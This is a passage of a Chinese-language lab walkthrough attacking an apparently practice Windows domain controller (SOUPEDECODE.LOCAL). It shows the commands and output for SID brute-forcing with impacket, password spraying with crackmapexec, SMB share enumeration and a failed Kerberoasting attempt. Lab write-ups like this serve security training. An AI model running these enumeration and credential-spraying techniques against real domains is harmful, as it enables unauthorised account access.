timestamp to every logging output\n\nconnection:\n  -target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it\n  -port [destination port]\n                        Destination port to connect to SMB Server\n  -domain-sids          Enumerate Domain SIDs (will likely forward requests to the DC)\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don&#039;t ask for password (useful when proxying through smbrelayx)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones\n                        specified in the command line\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 lookupsid.py soupedecode.local\/anonymous@$IP\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nPassword:\n[*] Brute forcing SIDs at 192.168.10.102\n[*] StringBinding ncacn_np:192.168.10.102[\\pipe\\lsarpc]\n[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164\n498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)\n500: SOUPEDECODE\\Administrator (SidTypeUser)\n501: SOUPEDECODE\\Guest (SidTypeUser)\n502: SOUPEDECODE\\krbtgt (SidTypeUser)\n512: SOUPEDECODE\\Domain Admins (SidTypeGroup)\n513: SOUPEDECODE\\Domain Users (SidTypeGroup)\n514: SOUPEDECODE\\Domain Guests (SidTypeGroup)\n515: SOUPEDECODE\\Domain Computers (SidTypeGroup)\n516: SOUPEDECODE\\Domain Controllers (SidTypeGroup)\n517: SOUPEDECODE\\Cert Publishers (SidTypeAlias)\n518: SOUPEDECODE\\Schema Admins (SidTypeGroup)\n519: SOUPEDECODE\\Enterprise Admins (SidTypeGroup)\n520: SOUPEDECODE\\Group Policy Creator Owners (SidTypeGroup)\n521: SOUPEDECODE\\Read-only Domain Controllers (SidTypeGroup)\n522: SOUPEDECODE\\Cloneable Domain Controllers (SidTypeGroup)\n..........\n2154: SOUPEDECODE\\PC-82$ (SidTypeUser)\n2155: SOUPEDECODE\\PC-83$ (SidTypeUser)\n2156: SOUPEDECODE\\PC-84$ (SidTypeUser)\n2157: SOUPEDECODE\\PC-85$ (SidTypeUser)\n2158: SOUPEDECODE\\PC-86$ (SidTypeUser)\n2159: SOUPEDECODE\\PC-87$ (SidTypeUser)\n2160: SOUPEDECODE\\PC-88$ (SidTypeUser)\n2161: SOUPEDECODE\\PC-89$ (SidTypeUser)\n2162: SOUPEDECODE\\PC-90$ (SidTypeUser)\n2163: SOUPEDECODE\\firewall_svc (SidTypeUser)\n2164: SOUPEDECODE\\backup_svc (SidTypeUser)\n2165: SOUPEDECODE\\web_svc (SidTypeUser)\n2166: SOUPEDECODE\\monitoring_svc (SidTypeUser)<\/code><\/pre>\n<h3>\u7206\u7834smb\u670d\u52a1<\/h3>\n<p>\u5c1d\u8bd5\u53d6\u51fa\u5bf9\u5e94\u5b57\u7b26\uff0c\u7b49\u4e0b\u5c1d\u8bd5\u7206\u7834smb\u670d\u52a1\uff0c\u5148\u7ed9\u4ed6\u590d\u5236\u5230\u4e00\u4e2a\u6587\u4ef6\u5939\u4e2d\uff0c\u7136\u540e\u5c1d\u8bd5\u5904\u7406\uff0c\u5728\u54a8\u8be2\u5b8c\u7fa4\u4e3b\uff08\u725b\u903cplus.jpg\uff09\u4ee5\u540e\u5f97\u5230\u4e86\u51e0\u79cd\u65b9\u6848\uff1a<\/p>\n<pre><code class=\"language-bash\"># grep -P &#039;(?&lt;=\\\\)[^ ]+&#039; -o\n# cat dic|awk -F&#039;[ \\\\\\\\]+&#039; &#039;{print $3}&#039;    \u6211\u5f3a\u70c8\u8981\u6c42\u7684\uff0c\u56e0\u4e3a\u6211\u5199\u7684\u662f\u8fd9\u79cd\u5199\u9519\u4e86\uff0cawk\u91cc\u9762\u4e00\u4e2a\\\u8981\u56db\u4e2a\\\u7528\u6765\u8f6c\u4e49\n# cat dic|sed &#039;s+\\\\+\/+g&#039;|awk -F&#039;[ \/]+&#039; &#039;{print $3}&#039;\n# \u5f3a\u5316\u7248\uff0c\u53ef\u80fd\u6709\u4e00\u4e2a\u6216\u4e24\u4e2a\u5b57\u7b26\n# cat dic|awk -F&#039;[(\\\\\\\\]+&#039; &#039;{print $2}\n# cat dic|grep -P &#039;(?&lt;=\\\\)[^(]+(?= )&#039;\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec -h                             \nusage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {smb,mssql,winrm,ldap,ftp,rdp,ssh} ...\n\n      ______ .______           ___        ______  __  ___ .___  ___.      ___      .______    _______ ___   ___  _______   ______\n     \/      ||   _  \\         \/   \\      \/      ||  |\/  \/ |   \\\/   |     \/   \\     |   _  \\  |   ____|\\  \\ \/  \/ |   ____| \/      |\n    |  ,----&#039;|  |_)  |       \/  ^  \\    |  ,----&#039;|  &#039;  \/  |  \\  \/  |    \/  ^  \\    |  |_)  | |  |__    \\  V  \/  |  |__   |  ,----&#039;\n    |  |     |      \/       \/  \/_\\  \\   |  |     |    &lt;   |  |\\\/|  |   \/  \/_\\  \\   |   ___\/  |   __|    &gt;   &lt;   |   __|  |  |\n    |  `----.|  |\\  \\----. \/  _____  \\  |  `----.|  .  \\  |  |  |  |  \/  _____  \\  |  |      |  |____  \/  .  \\  |  |____ |  `----.\n     \\______|| _| `._____|\/__\/     \\__\\  \\______||__|\\__\\ |__|  |__| \/__\/     \\__\\ | _|      |_______|\/__\/ \\__\\ |_______| \\______|\n\n                                                A swiss army knife for pentesting networks\n                                    Forged by @byt3bl33d3r and @mpgn_x64 using the powah of dank memes\n\n                                           Exclusive release for Porchetta Industries users\n                                                       https:\/\/porchetta.industries\/\n\n                                                   Version : 5.4.0\n                                                   Codename: Indestructible G0thm0g\n\noptions:\n  -h, --help            show this help message and exit\n  -t THREADS            set how many concurrent threads to use (default: 100)\n  --timeout TIMEOUT     max timeout in seconds of each thread (default: None)\n  --jitter INTERVAL     sets a random delay between each connection (default: None)\n  --darrell             give Darrell a hand\n  --verbose             enable verbose output\n\nprotocols:\n  available protocols\n\n  {smb,mssql,winrm,ldap,ftp,rdp,ssh}\n    smb                 own stuff using SMB\n    mssql               own stuff using MSSQL\n    winrm               own stuff using WINRM\n    ldap                own stuff using LDAP\n    ftp                 own stuff using FTP\n    rdp                 own stuff using RDP\n    ssh                 own stuff using SSH\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec smb $IP -u temp -p temp\nSMB         192.168.10.102  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise<\/code><\/pre>\n<p>\u597d\u5bb6\u4f19\uff0c\u7b2c\u4e00\u4e2a\u5c31\u662f\uff0clets go\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbmap -H 192.168.10.102 -u Enterprise\n\n    ________  ___      ___  _______   ___      ___       __         _______\n   \/&quot;       )|&quot;  \\    \/&quot;  ||   _  &quot;\\ |&quot;  \\    \/&quot;  |     \/&quot;&quot;\\       |   __ &quot;\\\n  (:   \\___\/  \\   \\  \/\/   |(. |_)  :) \\   \\  \/\/   |    \/    \\      (. |__) :)\n   \\___  \\    \/\\  \\\/.    ||:     \\\/   \/\\   \\\/.    |   \/&#039; \/\\  \\     |:  ____\/\n    __\/  \\   |: \\.        |(|  _  \\  |: \\.        |  \/\/  __&#039;  \\    (|  \/\n   \/&quot; \\   :) |.  \\    \/:  ||: |_)  :)|.  \\    \/:  | \/   \/  \\   \\  \/|__\/ \\\n  (_______\/  |___|\\__\/|___|(_______\/ |___|\\__\/|___|(___\/    \\___)(_______)\n -----------------------------------------------------------------------------\n     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com\n                     https:\/\/github.com\/ShawnDEvans\/smbmap\n\n[*] Detected 1 hosts serving SMB\n[*] Established 1 SMB session(s)                                \n\n[+] IP: 192.168.10.102:445      Name: soupedecode.local         Status: Authenticated\n        Disk                                                    Permissions     Comment\n        ----                                                    -----------     -------\n        ADMIN$                                                  NO ACCESS       Remote Admin\n        backup                                                  NO ACCESS\n        C$                                                      NO ACCESS       Default share\n        IPC$                                                    READ ONLY       Remote IPC\n        NETLOGON                                                NO ACCESS       Logon server share \n        SYSVOL                                                  NO ACCESS       Logon server share \n        Users                                                   NO ACCESS<\/code><\/pre>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/$IPC -U Enterprise\nPassword for [WORKGROUP\\Enterprise]:<\/code><\/pre>\n<p>\u6ca1\u6709\u4e1c\u897f\uff0c\u5636\uff0c\u662f\u6211\u6253\u9519\u4e86\uff0c\u91cd\u65b0\u770b\u4e00\u4e0b\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/IPC$ -U Enterprise\nPassword for [WORKGROUP\\Enterprise]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\&gt; ls\nNT_STATUS_NO_SUCH_FILE listing \\*\nsmb: \\&gt; pwd\nCurrent directory is \\\\192.168.10.102\\IPC$\\<\/code><\/pre>\n<p>\u8fd8\u662f\u4e0d\u884c\uff0c\u5c1d\u8bd5\uff0c\u7ee7\u7eed\u770b\u4e00\u4e0b\u522b\u7684\u7528\u6237\uff0c\u8dd1\u6210\u529f\u4e5f\u4e0d\u505c\uff0c\u770b\u770b\u591a\u5c11\u4e2a\u6210\u529f\u7684\uff01\u4e3a\u4e86\u964d\u4f4e\u7206\u7834\u538b\u529b\uff0c\u5148\u770b\u770b\u8d26\u53f7\u5bc6\u7801\u4e00\u6837\u7684\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ crackmapexec smb $IP -u temp -p temp --continue-on-success --no-bruteforce | grep -v &quot;FAILURE&quot;\nSMB                      192.168.10.102  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Domain:Domain \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Cert:Cert \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Schema:Schema \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Group:Group \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Read-only:Read-only \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Cloneable:Cloneable \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Protected:Protected \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Key:Key \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Enterprise:Enterprise \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\RAS:RAS \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Allowed:Allowed \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\Denied:Denied \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\DnsAdmins:DnsAdmins \nSMB                      192.168.10.102  445    DC01             [+] SOUPEDECODE.LOCAL\\DnsUpdateProxy:DnsUpdateProxy \nSMB                      192.168.10.102  445    DC01             [-] SOUPEDECODE.LOCAL\\ybob317:ybob317 STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u8ba4\u8bc1\u8fc7\u671f\u7684\uff01\u7785\u7785\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/192.168.10.102\/IPC$ -U ybob317                                                    \nPassword for [WORKGROUP\\ybob317]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u679c\u7136\u8fc7\u671f\u4e86\uff0c\u4f46\u662f\u6211\u4eec\u81f3\u5c11\u62ff\u5230\u4e86\u4e00\u4e2a\u7528\u6237\uff0c\u63a5\u4e0b\u6765\u5c31\u8be5\u770b\u770b\u5176\u4ed6\u65b9\u9762\u4e86\u3002<\/p>\n<h3>Kerberoasting<\/h3>\n<p>\u4e4b\u524d\u626b\u63cf\u7aef\u53e3\uff0c\u770b\u5230\u4e00\u4e2a\u7968\u636e\u8ba4\u8bc1\u7684\u670d\u52a1\u7aef\u53e3\uff0c\u5c1d\u8bd5\u627e\u76f8\u5173\u5de5\u5177\u626b\u4e00\u4e0b\uff01<\/p>\n<pre><code class=\"language-bash\">88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-11 03:40:33Z)<\/code><\/pre>\n<p>\u53c2\u8003\uff1a<a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-kerberos-88\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/pentesting-kerberos-88<\/a><\/p>\n<p>\u4f7f\u7528 <a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/GetUserSPNs.py\">https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/GetUserSPNs.py<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 GetUserSPNs.py -h                                    \nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\nusage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-no-preauth NO_PREAUTH] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE]\n                      [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]\n                      target\n\nQueries target domain for SPNs that are running under a user account\n\npositional arguments:\n  target                domain[\/username[:password]]\n\noptions:\n  -h, --help            show this help message and exit\n  -target-domain TARGET_DOMAIN\n                        Domain to query\/request if different than the domain of the user. Allows for Kerberoasting across trusts.\n  -no-preauth NO_PREAUTH\n                        account that does not require preauth, to obtain Service Ticket through the AS\n  -stealth              Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption \/ errors on large domains.\n  -usersfile USERSFILE  File with user per line to test\n  -request              Requests TGS for users and output them in JtR\/hashcat format (default False)\n  -request-user username\n                        Requests TGS for the SPN associated to the user specified (just the username, no domain needed)\n  -save                 Saves TGS requested to disk. Format is &lt;username&gt;.ccache. Auto selects -request\n  -outputfile OUTPUTFILE\n                        Output filename to write ciphers in JtR\/hashcat format. Auto selects -request\n  -ts                   Adds timestamp to every logging output.\n  -debug                Turn DEBUG output ON\n\nauthentication:\n  -hashes LMHASH:NTHASH\n                        NTLM hashes, format is LMHASH:NTHASH\n  -no-pass              don&#039;t ask for password (useful for -k)\n  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones\n                        specified in the command line\n  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)\n\nconnection:\n  -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter. Ignoredif -target-domain is specified.\n  -dc-host hostname     Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL\/ybob317:ybob317 -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c<\/code><\/pre>\n<p>\u7136\u540e\u6211\u91cd\u65b0\u626b\u63cf\u4e86\u4e00\u4e0b\u8fd9\u4e2a\u7aef\u53e3\u4fe1\u606f\uff0c\u53d1\u73b0\u65f6\u95f4\u4e0d\u540c\u6b65\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:03 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0014s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:15:06Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.28 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ date\nSat Aug 10 12:05:14 PM EDT 2024<\/code><\/pre>\n<p>\u9700\u8981\u540c\u6b65\u65f6\u949f\uff0c\u5c1d\u8bd5\u591a\u4e2a\u529e\u6cd5\u65e0\u679c\uff0c\u53ea\u80fd\u4f7f\u7528\u522b\u4eba\u7684\u529e\u6cd5\u8fa3\uff0c\u4e0b\u9762\u662f\u6211\u5c1d\u8bd5\u5931\u8d25\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre><code class=\"language-bash\"># sudo apt-get install ntpdate -y\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local \n2024-08-11 01:22:30.090816 (-0400) +47467.381814 +\/- 0.000614 soupedecode.local 192.168.10.102 s1 no-leap\nCLOCK: time stepped by 47467.381814\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ date\nSun Aug 11 01:22:33 AM EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP                                                                \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:11 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0011s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:22:56Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.36 seconds<\/code><\/pre>\n<p>\u4f7f\u7528<code>rdate<\/code>\u8fdb\u884c\u540c\u6b65\uff1a<\/p>\n<pre><code class=\"language-bash\"># sudo apt-get install rdate -y\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n 192.168.10.102 \nSun Aug 11 01:28:12 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP       \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:17 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0082s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:28:24Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.29 seconds<\/code><\/pre>\n<p>\u53d1\u73b0\u8fd8\u662f\u4e0d\u5bf9\uff0c\u91cd\u542f\u9776\u673a\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nmap -sCV -p 88 -Pn $IP       \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 12:18 EDT\nNmap scan report for soupedecode.local (192.168.10.102)\nHost is up (0.0023s latency).\n\nPORT   STATE SERVICE      VERSION\n88\/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-11 05:09:22Z)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 11.29 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo rdate -n 192.168.10.102\nSun Aug 11 01:09:33 EDT 2024\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo ntpdate soupedecode.local\n2024-08-11 01:09:44.141908 (-0400) +46218.812949 +\/- 0.000751 soupedecode.local 192.168.10.102 s1 no-leap\nCLOCK: time stepped by 46218.812949<\/code><\/pre>\n<p>\u770b\u6765\u5b9e\u9645\u4e0a\u662f\u6ca1\u6709\u5dee\u522b\u7684\uff0c\u5c31\u5148\u8fd9\u6837\u8bd5\u8bd5\uff1f\u8fd8\u662f\u4e0d\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ sudo python3 GetUserSPNs.py -dc-ip $IP SOUPEDECODE.LOCAL\/ybob317:ybob317 -request\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c<\/code><\/pre>\n<p>\u627e\u4e00\u4e0b\u4f7f\u7528\u65b9\u6cd5\uff0c\u770b\u770b\u662f\u4e0d\u662f\u64cd\u4f5c\u54ea\u91cc\u4e0d\u5bf9\uff1a<a href=\"https:\/\/notes.benheater.com\/books\/active-directory\/page\/getuserspnspy\">https:\/\/notes.benheater.com\/books\/active-directory\/page\/getuserspnspy<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ impacket-GetUserSPNs -dc-ip $IP &#039;soupedecode.local\/ybob317:ybob317&#039;\nImpacket v0.12.0.dev1 - Copyright 2023 Fortra\n\n[-] Error in bindRequest -&gt; invalidCredentials: 8009030C: LdapErr: DSID-0C0906B0, comment: AcceptSecurityContext error, data 532, v4f7c<\/code><\/pre>\n<p>\u5947\u5947\u602a\u602a\uff0c\u6ca1\u6709\u8111\u888b\uff0c\u91cd\u65b0\u8f7d\u5165\u9776\u673a\u548c\u653b\u51fb\u673a\uff0c\u518d\u8bd5\u4e00\u6b21\uff0c\u4e0d\u884c\u7761\u89c9\u3002\u3002\u3002\u3002\u3002\u8fd9\u90e8\u5206\u5148\u8df3\u4e86\uff0c\u611f\u89c9\u662f\u54ea\u91cc\u914d\u7f6e\u6709\u95ee\u9898\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/Users -U ybob317\nPassword for [WORKGROUP\\ybob317]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient -L $IP\nPassword for [WORKGROUP\\kali]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        backup          Disk      \n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n        NETLOGON        Disk      Logon server share \n        SYSVOL          Disk      Logon server share \n        Users           Disk      \nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 192.168.10.106 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ smbclient \/\/$IP\/backup -U file_svc\nPassword for [WORKGROUP\\file_svc]:\nsession setup failed: NT_STATUS_PASSWORD_EXPIRED<\/code><\/pre>\n<p>\u90fd\u8fc7\u671f\u4e86\uff0c\u6bc1\u706d\u5427\uff01\uff01\uff01\uff01\uff01\u540e\u9762\u542c\u7fa4\u4e3b\u63d0\u4e86\u4e00\u5634\uff0c\u9700\u8981\u624b\u52a8\u8fdb\u884c\u66f4\u65b0\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257567.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257567.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115201938\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p><code>ctrl+alt+del<\/code>(virtualbox \u91cc\u9762\u662f\u53f3\u952ectrl+del)\u89e3\u9501\uff0c\u7136\u540e\u6309esc\u8fd4\u56de\u4e0a\u4e00\u7ea7\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257568.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257568.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115723548\" \/><\/div><\/p>\n<p>\u66f4\u6362\u6211\u4eec\u5f97\u5230\u7684\u7528\u6237\u8fdb\u884c\u767b\u5f55\u66f4\u65b0\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257569.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257569.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816115833736\" style=\"zoom:50%;\" 